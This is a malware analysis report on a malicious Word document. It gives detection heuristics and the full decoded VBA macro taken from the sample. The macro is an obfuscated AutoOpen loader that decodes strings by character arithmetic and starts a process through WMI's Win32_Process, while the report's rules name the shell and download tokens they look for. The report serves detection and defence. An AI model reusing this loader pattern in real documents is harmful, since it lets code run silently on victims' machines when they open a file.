Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 863335a108ccff4b…

MALICIOUS

Office (OLE) / .DOC

44.5 KB Created: 2026-04-17 22:40:00 Authoring application: Microsoft Office Word First seen: 2026-06-12
MD5: 58347977753a3ed5772961a65cc2d576 SHA-1: f66aa5284bb235a8817e931268b876d0a0c69251 SHA-256: 863335a108ccff4bad75b6e8d829869fb7b01c132dd97b067bbc17705cf3bcad
258 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.011 System Binary Proxy Execution: Rundll32

The sample contains obfuscated VBA macros with an AutoOpen subroutine that calls a function to decode a string. This decoded string is then used with GetObject to execute a payload via WMI. The script attempts to execute a command using WMI, likely to download and run a second-stage payload.

Heuristics 9

  • ClamAV: Doc.Malware.Valyria-10009612-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10009612-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        GetObject(wmiPath).Get(wmiClass).Create Water, Null, Null, pid
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        GetObject(wmiPath).Get(wmiClass).Create Water, Null, Null, pid
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1477 bytes
SHA-256: 59f3055568e7cba88d28b8d867e4f24dbc8fd68a4105eace3d4c060aec1e4f88
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function Pears(Beets)
    Pears = Chr(Beets - 17)
End Function

Function Strawberries(Grapes)
    Strawberries = Left(Grapes, 3)
End Function

Function Almonds(Jelly)
    Almonds = Right(Jelly, Len(Jelly) - 3)
End Function

Function Nuts(Milk)
    Do
        Oatmilk = Oatmilk + Pears(Strawberries(Milk))
        Milk = Almonds(Milk)
    Loop While Len(Milk) > 0
    Nuts = Oatmilk
End Function


Sub AutoOpen()
    RunMaliciousCode
End Sub

Sub RunMaliciousCode()
    Dim Apples As String
    Dim Water As String
    
    Apples = "0"
    

    Water = Nuts(Apples)
    On Error Resume Next
    If ActiveDocument.Name <> Nuts("131134127127118131063117128116") Then
        Exit Sub
    End If
    On Error GoTo 0
    

    Dim wmiPath As String
    Dim wmiClass As String
    Dim pid As Variant
    
    wmiPath = Nuts("136122127126120126133132075")
    wmiClass = Nuts("104122127068067112097131128116118132132")
    
    ' Запуск через WMI (без окон)
    GetObject(wmiPath).Get(wmiClass).Create Water, Null, Null, pid
End Sub


Sub AutoClose()

End Sub

Sub AutoExit()

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.